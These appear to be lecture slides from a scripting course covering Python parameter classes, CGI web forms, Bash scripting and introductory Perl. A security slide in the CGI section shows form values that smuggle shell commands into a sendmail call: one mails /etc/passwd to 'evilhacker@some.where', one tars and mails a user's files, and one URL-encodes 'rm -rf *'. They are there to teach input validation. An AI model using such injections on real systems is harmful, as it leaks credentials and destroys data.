![]() | A little main program is needed to steer the actions in class SimViz:
adm = SimViz() adm.process_command_line_args(sys.argv[1:]) adm.simulate() adm.visualize() |
![]() | See src/examples/simviz1c.py |

![]() | Previous example: self.p['m'] holds the value of a parameter | ||||||||
![]() | There is more information associated with a parameter:
| ||||||||
![]() | Idea: Use a class to hold parameter information |

![]() | Class declaration:
class InputPrm:
"""class for holding data about a parameter"""
def __init__(self, name, default,
type=float): # string to type conversion func.
self.name = name
self.v = default # parameter value
self.str2type = type
|
![]() | Make a dictionary entry:
self.p['m'] = InputPrm('m', 1.0, float)
|
![]() | Convert from string value to the right type:
self.p['m'].v = self.p['m'].str2type(value) |

![]() | Interpret command-line arguments and store the right values (and types!) in the parameter dictionary:
def process_command_line_args(self, cmlargs):
"""load data from the command line into variables"""
opt_spec = map(lambda x: x+"=", self.p.keys())
try:
options, args = getopt.getopt(cmlargs,"",opt_spec)
except getopt.GetoptError:
...
for option, value in options:
key = option[2:]
self.p[key].v = self.p[key].str2type(value)
This handles any number of parameters and command-line arguments!
|

![]() | Example on a very compact Python statement:
opt_spec = map(lambda x: x+"=", self.p.keys()) |
![]() | Purpose: create option specifications to getopt, --opt proceeded by a value is specified as 'opt=' |
![]() | All the options have the same name as the keys in self.p |
![]() | Dissection:
def add_equal(s): return s+'=' # add '=' to a string # apply add_equal to all items in a list and return the # new list: opt_spec = map(add_equal, self.p.keys())or written out:
opt_spec = []
for key in self.p.keys():
opt_spec.append(add_equal(key))
|

![]() | A nice feature of Python is that
print self.pusually gives a nice printout of the object, regardless of the object's type |
![]() | Let's try to print a dictionary of user-defined data types:
{'A': <__main__.InputPrm instance at 0x8145214>,
'case': <__main__.InputPrm instance at 0x81455ac>,
'c': <__main__.InputPrm instance at 0x81450a4>
...
|
![]() | Python do not know how to print our InputPrm objects |
![]() | We can tell Python how to do it! |

![]() | print a means 'convert a to a string and print it' |
![]() | The conversion to string of a class can be specified in the functions __str__ and __repr__:
str(a) means calling a.__str__() repr(a) means calling a.__repr__() |
![]() | __str__: compact string output |
![]() | __repr__: complete class content |
![]() | print self.p (or str(self.p) or repr(self.p)), where self.p is a dictionary of InputPrm objects, will try to call the __repr__ function in InputPrm for getting the 'value' of the InputPrm object |

![]() | Here is a possible implementation:
class InputPrm:
...
def __repr__(self):
return str(self.v) + ' ' + str(self.str2type)
|
![]() | Printing self.p yields
{'A': 5.0 <type 'float'>,
'case': tmp1 <type 'str'>,
'c': 5.0 <type 'float'>
...
|

![]() | Good idea: write the string representation with the syntax needed to recreate the instance:
def __repr__(self):
# str(self.str2type) is <type 'type'>, extract 'type':
m = re.search(r"<type '(.*)'>", str(self.str2type))
if m:
return "InputPrm('%s',%s,%s)" % \
(self.name, self.__str__(), m.group(1))
def __str__(self):
"""compact output"""
value = str(self.v) # ok for strings and ints
if self.str2type == float:
value = "%g" % self.v # compact float representation
elif self.str2type == int:
value = "%d" % self.v # compact int representation
elif self.str2type == float:
value = "'%s'" % self.v # string representation
else:
value = "'%s'" % str(self.v)
return value
|

![]() | Write self.p to file:
f = open(somefile, 'w') f.write(str(self.p)) |
![]() | File contents:
{'A': InputPrm('A',5,float), ...
|
![]() | Loading the contents back into a dictionary:
f = open(somefile, 'r') q = eval(f.readline()) |


![]() | Topic: interactive Web pages (or: GUI on the Web) | ||||||
![]() | Methods:
| ||||||
![]() | Perl and Python are very popular for CGI programming |


![]() | Web version of the Scientific Hello World GUI |
![]() | HTML allows GUI elements (FORM) |
![]() | Here: text ('Hello, World!'), text entry (for r) and a button 'equals' for computing the sine of r |
![]() | HTML code:
<HTML><BODY BGCOLOR="white"> <FORM ACTION="hw1.py.cgi" METHOD="POST"> Hello, World! The sine of <INPUT TYPE="text" NAME="r" SIZE="10" VALUE="1.2"> <INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton"> </FORM></BODY></HTML> |

![]() | Widget type: INPUT TYPE |
![]() | Variable holding input: NAME |
![]() | Default value: VALUE |
![]() | Widgets: one-line text entry, multi-line text area, option list, scrollable list, button |

![]() | Pressing "equals" (i.e. submit button) calls
a script hw1.py.cgi
<FORM ACTION="hw1.py.cgi" METHOD="POST"> |
![]() | Form variables are packed into a string and sent to the program |
![]() | Python has a cgi module that makes it very easy to extract variables from forms
import cgi
form = cgi.FieldStorage()
r = form.getvalue("r")
|
![]() | Grab r, compute sin(r), write an HTML page with (say)
Hello, World! The sine of 2.4 equals 0.675463180551 |

![]() |
Tasks: get r, compute the sine, write the result on
a new Web page
#!/store/bin/python
import cgi, math
# required opening of all CGI scripts with output:
print "Content-type: text/html\n"
# extract the value of the variable "r":
form = cgi.FieldStorage()
r = form.getvalue("r")
s = str(math.sin(float(r)))
# print answer (very primitive HTML code):
print "Hello, World! The sine of %s equals %s" % (r,s)
|

![]() | A CGI script is run by a nobody or www user |
![]() | A header like
#!/usr/bin/env pythonrelies on finding the first python program in the PATH variable, and a nobody has a PATH variable out of our control |
![]() | Hence, we need to specify the interpreter explicitly:
#!/store/bin/python |
![]() | Old Python versions
do not support form.getvalue, use instead
r = form["r"].value |


![]() | Last example: HTML page + CGI script; the result of sin(r) was written on a new Web page |
![]() | Next example: just a CGI script |
![]() | The user stays within the same dynamic page, a la the Scientific Hello World GUI |
![]() | Tasks: extract r, compute sin(r), write HTML form |
![]() | The CGI script calls itself |

#!/store/bin/python
import cgi, math
print "Content-type: text/html\n" # std opening
# extract the value of the variable "r":
form = cgi.FieldStorage()
r = form.getvalue('r')
if r is not None:
s = str(math.sin(float(r)))
else:
s = ''; r = ''
# print complete form with value:
print """
<HTML><BODY BGCOLOR="white">
<FORM ACTION="hw2.py.cgi" METHOD="POST">
Hello, World! The sine of
<INPUT TYPE="text" NAME="r" SIZE="10" VALUE="%s">
<INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
%s </FORM></BODY></HTML>\n""" % (r,s)

![]() | What happens if the CGI script contains an error? |
![]() | Browser just responds "Internal Server Error" -- a nightmare |
![]() | Start your Python CGI scripts with
import cgitb; cgitb.enable()to turn on nice debugging facilities: Python errors now appear nicely formatted in the browser |

![]() |
Always run the CGI script from the command line before trying it in a browser!
unix> export QUERY_STRING="r=1.4" unix> ./hw2.py.cgi > tmp.html # don't run python hw2.py.cgi! unix> cat tmp.html |
![]() | Load tmp.html into a browser and view the result |
![]() | Multiple form variables are set like this:
QUERY_STRING="name=Some Body&phone=+47 22 85 50 50" |

![]() | Permissions you have as CGI script owner are usually different from the permissions of a nobody, e.g., file writing requires write permission for all users |
![]() | Environment variables (PATH, HOME etc.) are normally not available to a nobody |
![]() | Make sure the CGI script is in a directory where they are allowed to be executed (some systems require CGI scripts to be in special cgi-bin directories) |
![]() | Check that the header contains the right path to the interpreter on the Web server |
![]() | Good check: log in as another user (you become a nobody!) and try your script |

![]() | Sometimes you need to control environment variables in CGI scripts |
![]() | Example: running your Python with shared libraries
#!/usr/home/me/some/path/to/my/bin/python ... python requires shared libraries in directories specified by the environment variable LD_LIBRARY_PATH |
![]() | Solution: the CGI script is a shell script that sets up your environment prior to calling your real CGI script |

![]() |
General Bourne Again shell script wrapper:
#!/bin/bash
# usage: www.some.net/url/wrapper-sh.cgi?s=myCGIscript.py
# just set a minimum of environment variables:
export scripting=~inf3330/www_docs/scripting
export SYSDIR=/ifi/ganglot/k00/inf3330/www_docs/packages
export BIN=$SYSDIR/`uname`
export LD_LIBRARY_PATH=$BIN/lib:/usr/bin/X11/lib
export PATH=$scripting/src/tools:/usr/bin:/bin:/store/bin:$BIN/bin
export PYTHONPATH=$SYSDIR/src/python/tools:$scripting/src/tools
# or set up my complete environment (may cause problems):
# source /home/me/.bashrc
# extract CGI script name from QUERY_STRING:
script=`perl -e '$s=$ARGV[0]; $s =~ s/.*=//; \
print $s' $QUERY_STRING`
./$script
|

![]() | Suppose you ask for the user's email in a Web form |
![]() | Suppose the form is processed by this code:
if "mailaddress" in form:
mailaddress = form.getvalue("mailaddress")
note = "Thank you!"
# send a mail:
mail = os.popen("/usr/lib/sendmail " + mailaddress, 'w')
mail.write("...")
mail.close()
|
![]() | What happens if somebody gives this "address":
x; mail evilhacker@some.where < /etc/passwd?? |

![]() |
Another "address":
x; tar cf - /hom/hpl | mail evilhacker@some.wheresends out all my files that anybody can read |
![]() | Perhaps my password or credit card number reside in any of these files? |
![]() | The evilhacker can also feed Mb/Gb of data into the system to load the server |
![]() | Rule: Do not copy form input blindly to system commands! |
![]() | Be careful with shell wrappers |

![]() | Could test for bad characters like
&;`'\"|*?~<>^()[]{}$\n\r
|
![]() | Better: test for legal set of characters
# expect text and numbers: if re.search(r'[^a-zA-Z0-9]', input): # stop processing |
![]() | Always be careful with launching shell commands; check possibilities for unsecure side effects |

![]() | The shell wrapper script allows execution of a user-given command |
![]() | The command is intended to be the name of a secure CGI script, but the command can be misused |
![]() | Fortunately, the command is prefixed by ./
./$scriptso trying an rm -rf *, http://www.some.where/wrapper.sh.cgi?s="rm+-rf+%2A"does not work (./rm -rf *; ./rm is not found) |
The encoding of rm -rf * is carried out by
>>> urllib.urlencode({'s':'rm -rf *'})
's=rm+-rf+%2A'
|



![]() | The simviz1.py script has many input parameters, resulting in many form fields | ||||
![]() | We can write a small utility class for
|

class FormParameters:
"Easy handling of a set of form parameters"
def __init__(self, form):
self.form = form # a cgi.FieldStorage() object
self.parameter = {} # contains all parameters
def set(self, name, default_value=None):
"register a new parameter"
self.parameter[name] = default_value
def get(self, name):
"""Return the value of the form parameter name."""
if name in self.form:
self.parameter[name] = self.form.getvalue(name)
if name in self.parameter:
return self.parameter[name]
else:
return "No variable with name '%s'" % name

def tablerow(self, name):
"print a form entry in a table row"
print """
<TR>
<TD>%s</TD>
<TD><INPUT TYPE="text" NAME="%s" SIZE=10 VALUE="%s">
</TR>
""" % (name, name, self.get(name))
def tablerows(self):
"print all parameters in a table of form text entries"
print "<TABLE>"
for name in self.parameter.keys():
self.tablerow(name)
print "</TABLE>"

form = cgi.FieldStorage()
p = FormParameters(form)
p.set('m', 1.0) # register 'm' with default val. 1.0
p.set('b', 0.7)
...
p.set('case', "tmp1")
# start writing HTML:
print """
<HTML><BODY BGCOLOR="white">
<TITLE>Oscillator code interface</TITLE>
<IMG SRC="%s" ALIGN="left">
<FORM ACTION="simviz1.py.cgi" METHOD="POST">
...
""" % ...
# define all form fields:
p.tablerows()

![]() | We need a complete path to the simviz1.py script |
![]() | simviz1.py calls oscillator so its directory must be in the PATH variable |
![]() | simviz1.py creates a directory and writes files, hence nobody must be allowed to do this |
![]() | Failing to meet these requirements give typically Internal Server Error... |

# check that the simviz1.py script is available and
# that we have write permissions in the current dir
simviz_script = os.path.join(os.pardir,os.pardir,"intro",
"python","simviz1.py")
if not os.path.isfile(simviz_script):
print "Cannot find <PRE>%s</PRE>"\
"so it is impossible to perform simulations" % \
simviz_script
# make sure that simviz1.py finds the oscillator code, i.e.,
# define absolute path to the oscillator code and add to PATH:
osc = '/ifi/ganglot/k00/inf3330/www_docs/scripting/SunOS/bin'
os.environ['PATH'] = ':'.join([os.environ['PATH'],osc])
if not os.path.isfile(osc+'/oscillator'):
print "The oscillator program was not found"\
"so it is impossible to perform simulations"
if not os.access(os.curdir, os.W_OK):
print "Current directory has not write permissions"\
"so it is impossible to perform simulations"

if form: # run simulator and create plot
sys.argv[1:] = cmd.split() # simulate command-line args...
import simviz1 # run simviz1 as a script...
os.chdir(os.pardir) # compensate for simviz1.py's os.chdir
case = p.get('case')
os.chmod(case, 0777) # make sure anyone can delete subdir
# show PNG image:
imgfile = os.path.join(case,case+'.png')
if os.path.isfile(imgfile):
# make an arbitrary new filename to prevent that browsers
# may reload the image from a previous run:
import random
newimgfile = os.path.join(case,
'tmp_'+str(random.uniform(0,2000))+'.png')
os.rename(imgfile, newimgfile)
print """<IMG SRC="%s">""" % newimgfile
print '</BODY></HTML>'

![]() | 'Smart' caching strategies may result in old plots being shown |
![]() | Remedy: make a random filename such that the name of the plot changes each time a simulation is run
imgfile = os.path.join(case,case+".png")
if os.path.isfile(imgfile):
import random
newimgfile = os.path.join(case,
'tmp_'+str(random.uniform(0,2000))+'.png')
os.rename(imgfile, newimgfile)
print """<IMG SRC="%s">""" % newimgfile
|

![]() | We can automate the interaction with a dynamic Web page |
![]() | Consider hw2.py.cgi with one form field r |
![]() | Loading a URL agumented with the form parameter,
http://www.some.where/cgi/hw2.py.cgi?r=0.1is the same as loading http://www.some.where/cgi/hw2.py.cgiand manually filling out the entry with '0.1' |
![]() | We can write a Hello World script that performs the sine computation on a Web server and extract the value back to the local host |

![]() | Form fields and values can be placed in a dictionary and encoded correctly for use in a URL:
>>> import urllib
>>> p = {'p1':'some string','p2': 1.0/3, 'q1': 'Ødegård'}
>>> params = urllib.urlencode(p)
>>> params
'p2=0.333333333333&q1=%D8deg%E5rd&p1=some++string'
>>> URL = 'http://www.some.where/cgi/somescript.cgi'
>>> f = urllib.urlopen(URL + '?' + params) # GET method
>>> f = urllib.urlopen(URL, params) # POST method
|

import urllib, sys, re
r = float(sys.argv[1])
params = urllib.urlencode({'r': r})
URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
f = urllib.urlopen(URLroot + 'hw2.py.cgi?' + params)
# grab s (=sin(r)) from the output HTML text:
for line in f.readlines():
m = re.search(r'"equalsbutton">(.*)$', line)
if m:
s = float(m.group(1)); break
print 'Hello, World! sin(%g)=%g' % (r,s)

![]() | We can run our simviz1.py type of script such that the computations and generation of plots are performed on a server |
![]() | Our interaction with the computations is a front-end script to simviz1.py.cgi |
![]() | User interface of our script: same as simviz1.py |
![]() | Translate comman-line args to a dictionary |
![]() | Encode the dictionary (form field names and values) |
![]() | Open an augmented URL (i.e. run computations) |
![]() | Retrieve plot files from the server |
![]() | Display plot on local host |

import math, urllib, sys, os
# load command-line arguments into dictionary:
p = {'case': 'tmp1', 'm': 1, 'b': 0.7, 'c': 5, 'func': 'y',
'A': 5, 'w': 2*math.pi, 'y0': 0.2, 'tstop': 30, 'dt': 0.05}
for i in range(len(sys.argv[1:])):
if sys.argv[i] in p:
p[sys.argv[i]] = sys.argv[i+1]
params = urllib.urlencode(p)
URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
f = urllib.urlopen(URLroot + 'simviz1.py.cgi?' + params)
# get PostScript file:
file = p['case'] + '.ps'
urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
# the PNG file has a random number; get the filename from
# the output HTML file of the simviz1.py.cgi script:
for line in f.readlines():
m = re.search(r'IMG SRC="(.*)"', line)
if m:
file = m.group(1).strip(); break
urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
os.system('display ' + file)


![]() | The original scripting languages were (extensions of) command interpreters in operating systems |
![]() | Primary example: Unix shells |
![]() | Bourne shell (sh) was the first major shell |
![]() | C and TC shell (csh and tcsh) had improved command interpreters, but were less popular than Bourne shell for programming |
![]() | Bourne Again shell (Bash/bash): GNU/FSF improvement of Bourne shell |
![]() | Other Bash-like shells: Korn shell (ksh), Z shell (zsh) |
![]() | Bash is the dominating Unix shell today |

![]() | Learning Bash means learning Unix |
![]() | Learning Bash means learning the roots of scripting (Bourne shell is a subset of Bash) |
![]() | Shell scripts, especially in Bourne shell and Bash, are frequently encountered on Unix systems |
![]() | Bash is widely available (open source) and the dominating command interpreter and scripting language on today's Unix systems |
![]() | Shell scripts are often used to glue more advanced scripts in Perl and Python |

![]() | Greg Wilson's excellent online course: http://www.swc.scipy.org |
![]() | man bash |
![]() | ``Introduction to and overview of Unix'' link in doc.html |

![]() | Let's start with a script writing "Hello, World!" |
![]() | Scientific computing extension: compute the sine of a number as well |
![]() | The script (hw.sh) should be run like this:
./hw.sh 3.4or (less common): bash hw.py 3.4 |
![]() | Output:
Hello, World! sin(3.4)=-0.255541102027 |

![]() | how to read a command-line argument |
![]() | how to call a math (sine) function |
![]() | how to work with variables |
![]() | how to print text and numbers |

![]() | We use plain Bourne shell (/bin/sh) when special features of Bash (/bin/bash) are not needed |
![]() | Most of our examples can in fact be run under Bourne shell (and of course also Bash) |
![]() | Note that Bourne shell (/bin/sh) is usually just a link to Bash (/bin/bash) on Linux systems (Bourne shell is proprietary code, whereas Bash is open source) |

#!/bin/sh r=$1 # store first command-line argument in r s=`echo "s($r)" | bc -l` # print to the screen: echo "Hello, World! sin($r)=$s"

![]() | The first line specifies the interpreter of the script (here /bin/sh, could also have used /bin/bash) |
![]() | The command-line variables are available as the script variables
$1 $2 $3 $4 and so on |
![]() | Variables are initialized as
r=$1while the value of r requires a dollar prefix: my_new_variable=$r # copy r to my_new_variable |

![]() | Bourne shell and Bash have very little built-in math, we therefore need to use bc, Perl or Awk to do the math
s=`echo "s($r)" | bc -l`
s=`perl -e '$s=sin($ARGV[0]); print $s;' $r`
s=`awk "BEGIN { s=sin($r); print s;}"`
# or shorter:
s=`awk "BEGIN {print sin($r)}"`
|
![]() | Back quotes means executing the command inside the quotes and assigning the output to the variable on the left-hand-side
some_variable=`some Unix command` # alternative notation: some_variable=$(some Unix command) |

![]() | bc = interactive calculator |
![]() | Documentation: man bc |
![]() | bc -l means bc with math library |
![]() | Note: sin is s, cos is c, exp is e |
![]() | echo sends a text to be interpreted by bc and bc responds with output (which we assign to s)
variable=`echo "math expression" | bc -l` |

![]() | The echo command is used for writing:
echo "Hello, World! sin($r)=$s"and variables can be inserted in the text string (variable interpolation) |
![]() | Bash also has a printf function for format control:
printf "Hello, World! sin(%g)=%12.5e\n" $r $s |
![]() | cat is usually used for printing multi-line text (see next slide) |

![]() | Each source code line is printed prior to its execution of you -x as option to /bin/sh or /bin/bash |
![]() | Either in the header
#!/bin/sh -xor on the command line: unix> /bin/sh -x hw.sh unix> sh -x hw.sh unix> bash -x hw.sh |
![]() | Very convenient during debugging |

![]() | Bourne shell and Bash are not much used for file reading and manipulation; usually one calls up Sed, Awk, Perl or Python to do file manipulation |
![]() | File writing is efficiently done by 'here documents':
cat > myfile <<EOF multi-line text can now be inserted here, and variable interpolation a la $myvariable is supported. The final EOF must start in column 1 of the script file. EOF |

![]() | Typical application in numerical simulation:
| ||||
![]() | Programs are supposed to run in batch | ||||
![]() | Putting the two commands in a file, with some glue, makes a classical Unix script |

#!/bin/sh pi=3.14159 m=1.0; b=0.7; c=5.0; func="y"; A=5.0; w=`echo 2*$pi | bc` y0=0.2; tstop=30.0; dt=0.05; case="tmp1" screenplot=1

# read variables from the command line, one by one:
while [ $# -gt 0 ] # $# = no of command-line args.
do
option = $1; # load command-line arg into option
shift; # eat currently first command-line arg
case "$option" in
-m)
m=$1; shift; ;; # load next command-line arg
-b)
b=$1; shift; ;;
...
*)
echo "$0: invalid option \"$option\""; exit ;;
esac
done

case "$option" in
-m)
m=$1; shift; ;; # load next command-line arg
-b)
b=$1; shift; ;;
*)
echo "$0: invalid option \"$option\""; exit ;;
esac
versus
if [ "$option" == "-m" ]; then
m=$1; shift; # load next command-line arg
elif [ "$option" == "-b" ]; then
b=$1; shift;
else
echo "$0: invalid option \"$option\""; exit
fi

dir=$case
# check if $dir is a directory:
if [ -d $dir ]
# yes, it is; remove this directory tree
then
rm -r $dir
fi
mkdir $dir # create new directory $dir
cd $dir # move to $dir
# the 'then' statement can also appear on the 1st line:
if [ -d $dir ]; then
rm -r $dir
fi
# another form of if-tests:
if test -d $dir; then
rm -r $dir
fi
# and a shortcut:
[ -d $dir ] && rm -r $dir
test -d $dir && rm -r $dir

# write to $case.i the lines that appear between
# the EOF symbols:
cat > $case.i <<EOF
$m
$b
$c
$func
$A
$w
$y0
$tstop
$dt
EOF

![]() | Stand-alone programs can be run by just typing the name of the program |
![]() | If the program reads data from standard input, we can put the input in a file and redirect input:
oscillator < $case.i |
![]() | Can check for successful execution:
# the shell variable $? is 0 if last command # was successful, otherwise $? != 0 if [ "$?" != "0" ]; then echo "running oscillator failed"; exit 1 fi # exit n sets $? to n |

![]() | Variables can in Bash be integers, strings or arrays |
![]() | For safety, declare the type of a variable if it is not a string:
declare -i i # i is an integer declare -a A # A is an array |

![]() | Comparison of two integers use a syntax different comparison of two strings:
if [ $i -lt 10 ]; then # integer comparison if [ "$name" == "10" ]; then # string comparison |
![]() | Unless you have declared a variable to be an integer, assume that all variables are strings and use double quotes (strings) when comparing variables in an if test
if [ "$?" != "0" ]; then # this is safe if [ $? != 0 ]; then # might be unsafe |

![]() | Make Gnuplot script:
echo "set title '$case: m=$m ...'" > $case.gnuplot ... # contiune writing with a here document: cat >> $case.gnuplot <<EOF set size ratio 0.3 1.5, 1.0; ... plot 'sim.dat' title 'y(t)' with lines; ... EOF |
![]() | Run Gnuplot:
gnuplot -geometry 800x200 -persist $case.gnuplot if [ "$?" != "0" ]; then echo "running gnuplot failed"; exit 1 fi |

![]() | file writing |
![]() | for-loops |
![]() | running an application |
![]() | pipes |
![]() | writing functions |
![]() | file globbing, testing file types |
![]() | copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories |
![]() | directory tree traversal |
![]() | packing directory trees |

outfilename="myprog2.cpp" # append multi-line text (here document): cat >> $filename <<EOF /* This file, "$outfilename", is a version of "$infilename" where each line is numbered. */ EOF # other applications of cat: cat myfile # write myfile to the screen cat myfile > yourfile # write myfile to yourfile cat myfile >> yourfile # append myfile to yourfile cat myfile | wc # send myfile as input to wc

![]() | The for element in list construction:
files=`/bin/ls *.tmp` # we use /bin/ls in case ls is aliased for file in $files do echo removing $file rm -f $file done |
![]() | Traverse command-line arguments:
for arg; do # do something with $arg done # or full syntax; command-line args are stored in $@ for arg in $@; do # do something with $arg done |

![]() | Declare an integer counter:
declare -i counter counter=0 # arithmetic expressions must appear inside (( )) ((counter++)) echo $counter # yields 1 |
![]() | For-loop with counter:
declare -i n; n=1 for arg in $@; do echo "command-line argument no. $n is <$arg>" ((n++)) done |

declare -i i for ((i=0; i<$n; i++)); do echo $c done

![]() | Pack a series of files into one file |
![]() | Executing this single file as a Bash script packs out all the individual files again (!) |
![]() | Usage:
bundle file1 file2 file3 > onefile # pack bash onefile # unpack |
![]() | Writing bundle is easy:
#/bin/sh
for i in $@; do
echo "echo unpacking file $i"
echo "cat > $i <<EOF"
cat $i
echo "EOF"
done
|

![]() | Consider 2 fake files; file1
Hello, World! No sine computations todayand file2 1.0 2.0 4.0 0.1 0.2 0.4 |
![]() | Running bundle file1 file2 yields the output
echo unpacking file file1 cat > file1 <<EOF Hello, World! No sine computations today EOF echo unpacking file file2 cat > file2 <<EOF 1.0 2.0 4.0 0.1 0.2 0.4 EOF |

![]() | Running in the foreground:
cmd="myprog -c file.1 -p -f -q"; $cmd < my_input_file # output is directed to the file res $cmd < my_input_file > res # process res file by Sed, Awk, Perl or Python |
![]() | Running in the background:
myprog -c file.1 -p -f -q < my_input_file &or stop a foreground job with Ctrl-Z and then type bg |

![]() | Output from one command can be sent as input to another command via a pipe
# send files with size to sort -rn # (reverse numerical sort) to get a list # of files sorted after their sizes: /bin/ls -s | sort -r cat $case.i | oscillator # is the same as oscillator < $case.i |
![]() | Make a new application: sort all files in a directory
tree root, with the largest files appearing first, and
equip the output with paging functionality:
du -a root | sort -rn | less |

echo "s(1.2)" | bc -l # the sine of 1.2 # -l loads the math library for bc echo "e(1.2) + c(0)" | bc -l # exp(1.2)+cos(0) # assignment: s=`echo "s($r)" | bc -l` # or using Perl: s=`perl -e "print sin($r)"`

# compute x^5*exp(-x) if x>0, else 0 :
function calc() {
echo "
if ( $1 >= 0.0 ) {
($1)^5*e(-($1))
} else {
0.0
} " | bc -l
}
# function arguments: $1 $2 $3 and so on
# return value: last statement
# call:
r=4.2
s=`calc $r`

#!/bin/bash
function statistics {
avg=0; n=0
for i in $@; do
avg=`echo $avg + $i | bc -l`
n=`echo $n + 1 | bc -l`
done
avg=`echo $avg/$n | bc -l`
max=$1; min=$1; shift;
for i in $@; do
if [ `echo "$i < $min" | bc -l` != 0 ]; then
min=$i; fi
if [ `echo "$i > $max" | bc -l` != 0 ]; then
max=$i; fi
done
printf "%.3f %g %g\n" $avg $min $max
}

statistics 1.2 6 -998.1 1 0.1 # statistics returns a list of numbers res=`statistics 1.2 6 -998.1 1 0.1` for r in $res; do echo "result=$r"; done echo "average, min and max = $res"

List all .ps and .gif files using wildcard notation:
files=`ls *.ps *.gif`
# or safer, if you have aliased ls:
files=`/bin/ls *.ps *.gif`
# compress and move the files:
gzip $files
for file in $files; do
mv ${file}.gz $HOME/images
|

if [ -f $myfile ]; then
echo "$myfile is a plain file"
fi
# or equivalently:
if test -f $myfile; then
echo "$myfile is a plain file"
fi
if [ ! -d $myfile ]; then
echo "$myfile is NOT a directory"
fi
if [ -x $myfile ]; then
echo "$myfile is executable"
fi
[ -z $myfile ] && echo "empty file $myfile"

# rename $myfile to tmp.1: mv $myfile tmp.1 # force renaming: mv -f $myfile tmp.1 # move a directory tree my tree to $root: mv mytree $root # copy myfile to $tmpfile: cp myfile $tmpfile # copy a directory tree mytree recursively to $root: cp -r mytree $root # remove myfile and all files with suffix .ps: rm myfile *.ps # remove a non-empty directory tmp/mydir: rm -r tmp/mydir

# make directory: $dir = "mynewdir"; mkdir $mynewdir mkdir -m 0755 $dir # readable for all mkdir -m 0700 $dir # readable for owner only mkdir -m 0777 $dir # all rights for all # move to $dir cd $dir # move to $HOME cd # create intermediate directories (the whole path): mkdirhier $HOME/bash/prosjects/test1 # or with GNU mkdir: mkdir -p $HOME/bash/prosjects/test1

![]() | find visits all files in a directory tree and can execute one or more commands for every file |
![]() | Basic example: find the oscillator codes
find $scripting/src -name 'oscillator*' -print |
![]() | Or find all PostScript files
find $HOME \( -name '*.ps' -o -name '*.eps' \) -print |
![]() | We can also run a command for each file:
find rootdir -name filenamespec -exec command {} \; -print
# {} is the current filename
|

![]() |
Find all files larger than 2000 blocks a 512 bytes (=1Mb):
find $HOME -name '*' -type f -size +2000 -exec ls -s {} \;
|
![]() | Remove all these files:
find $HOME -name '*' -type f -size +2000 \
-exec ls -s {} \; -exec rm -f {} \;
or ask the user for permission to remove:
find $HOME -name '*' -type f -size +2000 \
-exec ls -s {} \; -ok rm -f {} \;
|

![]() | Find all files not being accessed for the last 90 days:
find $HOME -name '*' -atime +90 -printand move these to /tmp/trash:
find $HOME -name '*' -atime +90 -print \
-exec mv -f {} /tmp/trash \;
|
![]() | Note: this one does seemingly nothing...
find ~hpl/projects -name '*.tex'because it lacks the -print option for printing the name of all *.tex files (common mistake) |

![]() | The tar command can pack single files or all files in a directory tree into one file, which can be unpacked later
tar -cvf myfiles.tar mytree file1 file2 # options: # c: pack, v: list name of files, f: pack into file # unpack the mytree tree and the files file1 and file2: tar -xvf myfiles.tar # options: # x: extract (unpack) |
![]() | The tarfile can be compressed:
gzip mytar.tar # result: mytar.tar.gz |

![]() | Pack all PostScript figures:
tar -cvf ps.tar `find $HOME -name '*.ps' -print` gzip ps.tar |
![]() | Pack a directory but remove CVS directories and redundant files
# take a copy of the original directory:
cp -r myhacks /tmp/oblig1-hpl
# remove CVS directories
find /tmp/oblig1-hpl -name CVS -print -exec rm -rf {} \;
# remove redundant files:
find /tmp/oblig1-hpl \( -name '*~' -o -name '*.bak' \
-o -name '*.log' \) -print -exec rm -f {} \;
# pack files:
tar -cf oblig1-hpl.tar /tmp/tar/oblig1-hpl.tar
gzip oblig1-hpl.tar
# send oblig1-hpl.tar.gz as mail attachment
|


![]() | Perl in a recent version (5.8) |
![]() | the following packages: Bundle::libnet, Tk, LWP::Simple, CGI::Debug, CGI::QuickForm |

![]() | We start with writing "Hello, World!" and computing the sine of a number given on the command line |
![]() | The script (hw.pl) should be run like this:
perl hw.pl 3.4or just (Unix) ./hw.pl 3.4 |
![]() | Output:
Hello, World! sin(3.4)=-0.255541102027 |

![]() | how to read a command-line argument |
![]() | how to call a math (sine) function |
![]() | how to work with variables |
![]() | how to print text and numbers |

#!/usr/bin/perl # fetch the first (0) command-line argument: $r = $ARGV[0]; # compute sin(r) and store in variable $s: $s = sin($r); # print to standard output: print "Hello, World! sin($r)=$s\n";

![]() | The first line specifies the interpreter of the script (here /usr/bin/perl)
perl hw.py 1.4 # first line: just a comment ./hw.py 1.4 # first line: interpreter spec. |
![]() | Scalar variables in Perl start with a dollar sign |
![]() | Each statement must end with a semicolon |
![]() | The command-line arguments are stored in an array ARGV
$r = $ARGV[0]; # get the first command-line argument |

![]() | Strings are automatically converted to numbers if necessary
$s = sin($r)(recall Python's need to convert r to float) |
![]() | Perl supports variable interpolation (variables are inserted directly into the string): print "Hello, World! sin($r)=$s\n";or we can control the format using printf: printf "Hello, World! sin(%g)=%12.5e\n", $r, $s;(printf in Perl works like printf in C) |

![]() | Only double-quoted strings work with variable interpolation:
print "Hello, World! sin($r)=$s\n"; |
![]() | Single-quoted strings do not recognize Perl variables:
print 'Hello, World! sin($r)=$s\n';yields the output Hello, World! sin($r)=$s |
![]() | Single- and double-quoted strings can span several lines (a la triple-quoted strings in Python) |

![]() | Use perldoc to read Perl man pages:
perldoc perl # overview of all Perl man pages perldoc perlsub # read about subroutines perldoc Cwd # look up a special module, here 'Cwd' perldoc -f printf # look up a special function, here 'printf' perldoc -q cgi # seach the FAQ for the text 'cgi' |
![]() | Become familiar with the man pages |
![]() | Does Perl have a function for ...? Check perlfunc |
![]() | Very useful Web site: www.perldoc.com |
![]() | Alternative: The 'Camel book' (much of the man pages are taken from that book) |
![]() | Many textbooks have more accessible info about Perl |

![]() | Read (x,y) data from a two-column file |
![]() | Transform y values to f(y) |
![]() | Write (x,f(y)) to a new file |
![]() | File opening, reading, writing, closing |
![]() | How to write and call a function |
![]() | How to work with arrays |

![]() | Read two command-line arguments: input and output filenames
($infilename, $outfilename) = @ARGV;variable by variable in the list on the left is set equal to the @ARGV array |
![]() | Could also write
